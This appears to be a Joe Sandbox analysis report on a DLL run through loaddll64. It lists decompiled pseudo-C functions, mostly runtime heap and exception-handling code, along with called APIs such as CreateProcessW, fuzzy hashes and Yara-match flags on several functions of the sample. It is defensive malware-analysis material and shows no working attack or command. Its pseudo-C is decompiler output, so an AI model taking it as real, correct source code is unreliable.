			E00007FFD7FFD1466A9DC(intOrPtr* __rax, void* __rcx) {
				int _t1;
				intOrPtr _t3;
				void* _t4;
				void* _t11;
				intOrPtr _t14;

				if (__rcx == 0) goto 0x1466aa17;
				_t14 =  *0x146df930; // 0x2a683700000, executed
				_t1 = HeapFree(_t11, ??); // executed
				if (_t1 != 0) goto 0x1466aa12;
				_t3 = E00007FFD7FFD1466B34C(GetLastError(), __rax, _t14, __rcx);
				_t4 = E00007FFD7FFD1466B420(__rax);
				 *__rax = _t3;
				return _t4;
			}

0x7ffd1466a9df
0x7ffd1466a9eb
0x7ffd1466a9f2
0x7ffd1466a9fa
0x7ffd1466aa04
0x7ffd1466aa0b
0x7ffd1466aa10
0x7ffd1466aa17

APIs

RtlReleasePrivilege.NTDLL(?,?,00000000,00007FFD1466F492,?,?,?,00007FFD1466F4CF,?,?,00000000,00007FFD1466F144,?,?,?,00007FFD1466F077), ref: 00007FFD1466A9F2
GetLastError.KERNEL32(?,?,00000000,00007FFD1466F492,?,?,?,00007FFD1466F4CF,?,?,00000000,00007FFD1466F144,?,?,?,00007FFD1466F077), ref: 00007FFD1466A9FC

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: ErrorLastPrivilegeRelease
String ID:
API String ID: 1334314998-0
Opcode ID: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
Instruction ID: fab6aeb8219406b1f7b90237215719eb09a8239e4de016929b7d3c00d5851948
Opcode Fuzzy Hash: 1178260e8bffcb175f16ce8929f72affff1d2575aebcf493ec367cb625912061
Instruction Fuzzy Hash: 85E08C10F19E03C2FF086BB298F40F812909F87B3CF444034C90D96262EE3CAC454204

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800284B0 Relevance: 1.6, APIs: 1, Instructions: 121processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE ref: 000000018002867E

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction ID: b9dfd44ec2654d149dbfc67a3d285e1c446cc2681133f70a5a1c8efdf6c35088
Opcode Fuzzy Hash: 16f61cbd6d489d93c3999831aad5c05b50de217028ac9f2dcc58791474f8e422
Instruction Fuzzy Hash: 59415D7090C7848FE7B8DF18D48979ABBE0FB88315F108A1EE48DC7291DB349448CB46

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD146622B0 Relevance: 1.6, APIs: 1, Instructions: 57
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 50%

			E00007FFD7FFD146622B0(long long __rax, long long __rcx, long long __rdx, long long _a8, long long _a16, signed char _a24) {
				long long _v16;
				signed char _v24;
				intOrPtr* _t48;
				intOrPtr* _t50;

				_t48 = __rax;
				_a24 = r8b;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFD7FFD14662830(__rax, _a8);
				if (_t48 - _a16 >= 0) goto 0x146622de;
				E00007FFD7FFD14662230(_a8);
				E00007FFD7FFD14662150(_t48, _a8);
				if ( *_t48 - _a16 >= 0) goto 0x14662310;
				E00007FFD7FFD14662170(_t48, _a8);
				E00007FFD7FFD14662600(_a8, _a16,  *_t48); // executed
				goto 0x1466237a;
				if ((_a24 & 0x000000ff) == 0) goto 0x14662366;
				if (_a16 - 0x10 >= 0) goto 0x14662366;
				E00007FFD7FFD14662170(_t48, _a8);
				if (_a16 -  *_t48 >= 0) goto 0x14662341;
				_t50 = _a16;
				_v16 = _t50;
				goto 0x14662353;
				E00007FFD7FFD14662170(_t50, _a8);
				_v16 =  *_t50;
				E00007FFD7FFD14661910(1,  *_t50, _a8, _v16);
				goto 0x1466237a;
				if (_a16 != 0) goto 0x1466237a;
				E00007FFD7FFD146623A0( *_t50, _a8, _a16);
				if (_a16 <= 0) goto 0x1466238c;
				_v24 = 1;
				goto 0x14662394;
				_v24 = 0;
				return _v24 & 0x000000ff;
			}

0x7ffd146622b0
0x7ffd146622b0
0x7ffd146622b5
0x7ffd146622ba
0x7ffd146622c8
0x7ffd146622d2
0x7ffd146622d9
0x7ffd146622e3
0x7ffd146622f0
0x7ffd146622f7
0x7ffd14662309
0x7ffd1466230e
0x7ffd14662317
0x7ffd1466231f
0x7ffd14662326
0x7ffd14662333
0x7ffd14662335
0x7ffd1466233a
0x7ffd1466233f
0x7ffd14662346
0x7ffd1466234e
0x7ffd1466235f
0x7ffd14662364
0x7ffd1466236c
0x7ffd14662375
0x7ffd14662380
0x7ffd14662382
0x7ffd1466238a
0x7ffd1466238c
0x7ffd1466239d

APIs

Part of subcall function 00007FFD14662830: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466283E
Part of subcall function 00007FFD14662830: Concurrency::details::SchedulerBase::ThrottlerDispatchBridge.LIBCMTD ref: 00007FFD1466284B

_Mtx_guard::~_Mtx_guard.LIBCPMTD ref: 00007FFD146622D9

Part of subcall function 00007FFD14662170: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD1466217E

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::$EmptyQueue::StructuredWork$Base::BridgeDispatchMtx_guardMtx_guard::~_SchedulerThrottler
String ID:
API String ID: 1903167320-0
Opcode ID: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction ID: f4edab57ad5de398ef0ae594587d3a5ff44e318206d5e328b6dc59867ce1643b
Opcode Fuzzy Hash: 8412a15bbd2f4d89551e98d62f984fcb6a76ab0910fb464f93224fef732d8c49
Instruction Fuzzy Hash: 7D21BF3260CE4181FB10AB25E4A03AEA770FBC77B8F500435E78D57669CF2DD5508B41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466AAD0 Relevance: 1.5, APIs: 1, Instructions: 36
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD1466AAD0(void* __eax, signed int __rcx, signed int __rdx) {
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x1466aaef;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x1466ab32;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x1466ab16;
				if (E00007FFD7FFD1466E958() == 0) goto 0x1466ab32;
				if (E00007FFD7FFD146697EC(_t22,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x1466ab32;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x1466ab01;
				goto 0x1466ab3f;
				E00007FFD7FFD1466B420(_t22);
				 *_t22 = 0xc;
				return 0;
			}

0x7ffd1466aad0
0x7ffd1466aadf
0x7ffd1466aae3
0x7ffd1466aae3
0x7ffd1466aaed
0x7ffd1466aafb
0x7ffd1466aaff
0x7ffd1466ab08
0x7ffd1466ab14
0x7ffd1466ab25
0x7ffd1466ab2e
0x7ffd1466ab30
0x7ffd1466ab32
0x7ffd1466ab37
0x7ffd1466ab44

APIs

RtlAllocateHeap.NTDLL(?,?,00000000,00007FFD1466BAAE,?,?,?,00007FFD1466B429,?,?,?,?,00007FFD14670426,?,?,00000000), ref: 00007FFD1466AB25

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction ID: 0f63a93ab0f9b916c3c5f96579245d6a2807744cbee452175d5ce92fcea3ad6b
Opcode Fuzzy Hash: 280286a628102559a8464dffd4b609b20cb420f0fe1f18d1be992a8bc7a4b5f6
Instruction Fuzzy Hash: D4F01D54B1AA4782FE585B7299F12F9128A5F57B7CF4C5435CD4E863D1ED2CEC818210

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD1466AA18 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 37%

			E00007FFD7FFD1466AA18(intOrPtr* __rax, void* __rcx) {

				if (__rcx - 0xffffffe0 > 0) goto 0x1466aa63;
				_t16 =  ==  ? __rax : __rcx;
				goto 0x1466aa4a;
				if (E00007FFD7FFD1466E958() == 0) goto 0x1466aa63;
				if (E00007FFD7FFD146697EC(__rax,  ==  ? __rax : __rcx) == 0) goto 0x1466aa63;
				RtlAllocateHeap(??, ??, ??); // executed
				if (__rax == 0) goto 0x1466aa35;
				goto 0x1466aa70;
				E00007FFD7FFD1466B420(__rax);
				 *__rax = 0xc;
				return 0;
			}

0x7ffd1466aa25
0x7ffd1466aa2f
0x7ffd1466aa33
0x7ffd1466aa3c
0x7ffd1466aa48
0x7ffd1466aa56
0x7ffd1466aa5f
0x7ffd1466aa61
0x7ffd1466aa63
0x7ffd1466aa68
0x7ffd1466aa75

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FFD1467040D,?,?,00000000,00007FFD1466D8B7,?,?,?,00007FFD1466A427,?,?,?,00007FFD1466A31D), ref: 00007FFD1466AA56

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction ID: 0919a4bd325a9d9c36c0cb9ea1be424d35503695282e4fe38d07b0d5b3edbac3
Opcode Fuzzy Hash: 4885db743ff87431de90f68300da65782b6b7874996cc61f6450c8fa48a4abb9
Instruction Fuzzy Hash: 0BF05811F1DA0388FE645A739AF12F952808F47BB8F081231DC6E863C5DE6CA4414620

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661540 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FFD7FFD14661540(long long __rcx, long long _a8) {
				long long _v24;
				intOrPtr* _t9;
				long long _t13;

				_a8 = __rcx;
				_v24 = 0xfffffffe;
				r8d = 0;
				E00007FFD7FFD14661910(1, _t9, _a8, _t13); // executed
				return E00007FFD7FFD146617A0(_a8);
			}

0x7ffd14661540
0x7ffd14661549
0x7ffd14661552
0x7ffd1466155c
0x7ffd14661571

APIs

Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD14661567

Part of subcall function 00007FFD146617A0: Concurrency::details::WorkQueue::IsStructuredEmpty.LIBCMTD ref: 00007FFD146617B1

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Concurrency::details::EmptyQueue::StructuredWork
String ID:
API String ID: 1865873047-0
Opcode ID: 1bd39886feb57d30d74c3629fbbe9167a18a0f50d6d703a3308aa091c38b80aa
Instruction ID: 6a9b58bac6053c9a551d3b1faf879f569495a0b670d82c6edd132cfd4036e9bb
Opcode Fuzzy Hash: 1bd39886feb57d30d74c3629fbbe9167a18a0f50d6d703a3308aa091c38b80aa
Instruction Fuzzy Hash: 34D0C722A38981C2D610AB34E89649E6720F7D33B4FA05730EAFD43AE5CE2ED5158F04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14661B10 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00007FFD7FFD14661B10(void* __rax, long long __rcx, long long __rdx, long long _a8, long long _a16) {
				void* _t7;
				void* _t8;

				_t8 = __rax;
				_a16 = __rdx;
				_a8 = __rcx;
				E00007FFD7FFD146611A0(_a16);
				_t7 = E00007FFD7FFD14661B40(_t8, _a8, _a16, _t8); // executed
				return _t7;
			}

0x7ffd14661b10
0x7ffd14661b10
0x7ffd14661b15
0x7ffd14661b23
0x7ffd14661b35
0x7ffd14661b3e

APIs

char_traits.LIBCPMTD ref: 00007FFD14661B23

Part of subcall function 00007FFD14661B40: Concurrency::details::ContextBase::GetWorkQueueIdentity.LIBCMTD ref: 00007FFD14661B6E

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Base::Concurrency::details::ContextIdentityQueueWorkchar_traits
String ID:
API String ID: 1444011685-0
Opcode ID: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction ID: 313b3b934088fa191ac9fc6bf6cd1d6570ff15caf584aa7725fdbe470364feaa
Opcode Fuzzy Hash: f789d12e206d7980509269e3e814af15646fd7b4fc038a1338794e0a1668acec
Instruction Fuzzy Hash: 4BD09E66A29A81C1D544EB22F89109AA764EBD67D4F405435FA8E82B2ADE28C1554B00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00007FFD14673CB0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 97registrywindowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32 ref: 00007FFD14673D39
RegisterTouchWindow.USER32 ref: 00007FFD14673D5A
MessageBoxW.USER32 ref: 00007FFD14673D7A

Strings

Cannot register application window for multi-touch input, xrefs: 00007FFD14673D6E
Error, xrefs: 00007FFD14673D67

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: Window$CreateMessageRegisterTouch
String ID: Cannot register application window for multi-touch input$Error
API String ID: 490141109-480840240
Opcode ID: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction ID: 74d01bd82468a8faa9eb556a2d3356b4055432ba8d7991d7c967290f76cdee3a
Opcode Fuzzy Hash: 84ab5ff6cfcc38e4e1d3a2e7420c273c9b72630a33a8e8b258941c1555e1b344
Instruction Fuzzy Hash: ED51F471B08F4686F750DB25E8A43AA73A0FB877A8F504536D98E867A4DF7CE084C740

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180003BE8 Relevance: 10.9, Strings: 8, Instructions: 895COMMON

Download Yara Rule

Strings

%wk, xrefs: 0000000180004571
~JO, xrefs: 0000000180003CC5
Hp, xrefs: 00000001800040E6
KI@l, xrefs: 00000001800040D8
@, xrefs: 0000000180003F3F
K, xrefs: 00000001800043B5
]I, xrefs: 0000000180003E1A
^e?u, xrefs: 0000000180003EAF

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: %wk$@$Hp$KI@l$]I$^e?u$~JO$K
API String ID: 0-1942796489
Opcode ID: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
Instruction ID: e1c3b1e3eb44e9ced759bc87f3cac7b1a040f97d798b52c0718f9fedf429efa7
Opcode Fuzzy Hash: 0db96a3033a52dec7f41ba08dcaea74adbed8d76393b2956a65234561adab349
Instruction Fuzzy Hash: 71A2F871504B8C8FEB59CF28C88A59E7BE2FB84744F20461DF96A872A0D774D945CF82

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180012780 Relevance: 9.3, Strings: 7, Instructions: 537COMMON

Download Yara Rule

Strings

Z<, xrefs: 0000000180012E02
G(, xrefs: 0000000180012F52
D, xrefs: 0000000180012E27
y, xrefs: 0000000180012C97
o7=/, xrefs: 0000000180012D35
k, xrefs: 000000018001303C
7', xrefs: 0000000180012DC7

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: k$7'$D$G($Z<$o7=/$y
API String ID: 0-1865188920
Opcode ID: d517ad9a530fb802bb13479e859ccf9692cae92b90ad32258a35f0c9934de413
Instruction ID: fda8176045f72ddac869dc68b56e77e08c564191d5b4e17a01401cd0e62d40de
Opcode Fuzzy Hash: d517ad9a530fb802bb13479e859ccf9692cae92b90ad32258a35f0c9934de413
Instruction Fuzzy Hash: 2032E17150C7848FD798CFA9C58A65BFBE1FB88744F108A1DF486862A0D7F8D949CB42

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFD14669474 Relevance: 9.1, APIs: 6, Instructions: 83
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 65%

			E00007FFD7FFD14669474(void* __ecx, intOrPtr __edx, void* __esp, long long __rbx, void* __rdx, long long __rsi, void* __r8) {
				void* __rdi;
				void* _t36;
				int _t40;
				void* _t45;
				intOrPtr _t53;
				signed long long _t63;
				long long _t66;
				_Unknown_base(*)()* _t86;
				void* _t90;
				void* _t91;
				void* _t93;
				signed long long _t94;
				struct _EXCEPTION_POINTERS* _t100;

				_t46 = __ecx;
				 *((long long*)(_t93 + 0x10)) = __rbx;
				 *((long long*)(_t93 + 0x18)) = __rsi;
				_t91 = _t93 - 0x4f0;
				_t94 = _t93 - 0x5f0;
				_t63 =  *0x146de008; // 0xef3156171c50
				 *(_t91 + 0x4e0) = _t63 ^ _t94;
				_t53 = r8d;
				_t45 = __ecx;
				if (__ecx == 0xffffffff) goto 0x146694b3;
				E00007FFD7FFD1466493C(_t36);
				r8d = 0x98;
				E00007FFD7FFD14666920(__ecx, 0, _t53, __esp, _t94 + 0x70, __rdx, _t86, __r8);
				r8d = 0x4d0;
				E00007FFD7FFD14666920(_t46, 0, _t53, __esp, _t91 + 0x10, __rdx, _t86, __r8);
				 *((long long*)(_t94 + 0x48)) = _t94 + 0x70;
				_t66 = _t91 + 0x10;
				 *((long long*)(_t94 + 0x50)) = _t66;
				__imp__RtlCaptureContext();
				r8d = 0;
				__imp__RtlLookupFunctionEntry();
				if (_t66 == 0) goto 0x14669546;
				 *(_t94 + 0x38) =  *(_t94 + 0x38) & 0x00000000;
				 *((long long*)(_t94 + 0x30)) = _t94 + 0x58;
				 *((long long*)(_t94 + 0x28)) = _t94 + 0x60;
				 *((long long*)(_t94 + 0x20)) = _t91 + 0x10;
				__imp__RtlVirtualUnwind();
				 *((long long*)(_t91 + 0x108)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x70)) = __edx;
				 *((long long*)(_t91 + 0xa8)) = _t91 + 0x510;
				 *((long long*)(_t91 - 0x80)) =  *((intOrPtr*)(_t91 + 0x508));
				 *((intOrPtr*)(_t94 + 0x74)) = _t53;
				_t40 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(_t86, _t90);
				if (UnhandledExceptionFilter(_t100) != 0) goto 0x146695a8;
				if (_t40 != 0) goto 0x146695a8;
				if (_t45 == 0xffffffff) goto 0x146695a8;
				return E00007FFD7FFD14663A70(E00007FFD7FFD1466493C(_t42), _t45, 0,  *(_t91 + 0x4e0) ^ _t94);
			}

0x7ffd14669474
0x7ffd14669474
0x7ffd14669479
0x7ffd14669482
0x7ffd1466948a
0x7ffd14669491
0x7ffd1466949b
0x7ffd146694a2
0x7ffd146694a7
0x7ffd146694ac
0x7ffd146694ae
0x7ffd146694ba
0x7ffd146694c0
0x7ffd146694cb
0x7ffd146694d1
0x7ffd146694db
0x7ffd146694e4
0x7ffd146694e8
0x7ffd146694ed
0x7ffd14669502
0x7ffd14669505
0x7ffd1466950e
0x7ffd14669510
0x7ffd14669523
0x7ffd14669530
0x7ffd14669539
0x7ffd14669540
0x7ffd1466954d
0x7ffd1466955f
0x7ffd14669563
0x7ffd14669571
0x7ffd14669575
0x7ffd14669579
0x7ffd14669583
0x7ffd14669596
0x7ffd1466959a
0x7ffd1466959f
0x7ffd146695ce

APIs

RtlCaptureContext.KERNEL32 ref: 00007FFD146694ED
RtlLookupFunctionEntry.KERNEL32 ref: 00007FFD14669505
RtlVirtualUnwind.KERNEL32 ref: 00007FFD14669540
IsDebuggerPresent.KERNEL32 ref: 00007FFD14669579
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFD14669583
UnhandledExceptionFilter.KERNEL32 ref: 00007FFD1466958E

Memory Dump Source

Source File: 00000000.00000002.264769002.00007FFD14661000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFD14660000, based on PE: true

Associated: 00000000.00000002.264760756.00007FFD14660000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.264838917.00007FFD14698000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265068777.00007FFD146DE000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265077615.00007FFD146E2000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265084016.00007FFD146E5000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.265090984.00007FFD146E7000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd14660000_loaddll64.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction ID: a965514090ac579cab5c7f66c89681dabe9b2c67780a36c058a3f58f541c865e
Opcode Fuzzy Hash: d9a81825362c2da034dc73a6dcc45eb26ccc4f6f61a283cd1a377bdfab111a7c
Instruction Fuzzy Hash: 8D315E36718F8186E760CF35E8902EE77A4FB86768F500136EA8D43B55DF38D5558B00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180021A2C Relevance: 7.0, Strings: 5, Instructions: 775COMMON

Download Yara Rule

Strings

F, xrefs: 0000000180022101
Aw, xrefs: 00000001800223B5
>#3, xrefs: 00000001800226F2
??, xrefs: 0000000180021F2D
J, xrefs: 0000000180022998

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: >#3$??$Aw$F$J
API String ID: 0-2784440385
Opcode ID: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
Instruction ID: 9fdd82093245732d6ff01b86e1d36ab714c40b68dc6afb612ae034bafb5e4a55
Opcode Fuzzy Hash: 9b37fcd8b9b3a2236a01d1c259a381c152bbfd2ce75b9ee2bc70d5e09618c5cf
Instruction Fuzzy Hash: C9924F7054838B8FDB78CF24C845BEE7BE1FB84304F10452DE8698A761E7749A49DB82

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180006B5C Relevance: 6.6, Strings: 5, Instructions: 375COMMON

Download Yara Rule

Strings

9`^p, xrefs: 0000000180006F9F
<, xrefs: 0000000180007028
>S1, xrefs: 0000000180006C51
@K, xrefs: 0000000180006E7C
$, xrefs: 0000000180007041

Memory Dump Source

Source File: 00000000.00000002.262741356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180001000_loaddll64.jbxd

Yara matches

Similarity

API ID:
String ID: $$9`^p$>S1$@K$<
API String ID: 0-904861090
Opcode ID: 7e13130689c942aa12df05012069a4264cc12f2cb0cc79f599492960cab10520
Instruction ID: d0ca11fee3017775904e89b4535bcf8825016c76ce67da6f48249d0445d1abfd
Opcode Fuzzy Hash: 7e13130689c942aa12df05012069a4264cc12f2cb0cc79f599492960cab10520
Instruction Fuzzy Hash: BC12E37150078CDBDBACCF68C88A6DD3FB1FB443A4F605219F942962A0D7B5D989CB81

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180014C48 Relevance: 6.5, Strings: 5, Instructions: 236COMMON

Download Yara Rule

Strings

f_, xrefs: 0000000180014F12
"4, xrefs: 0000000180014F27
, xrefs: 0000000180014DEE, 0000000180014CE7, 0000000180014D11
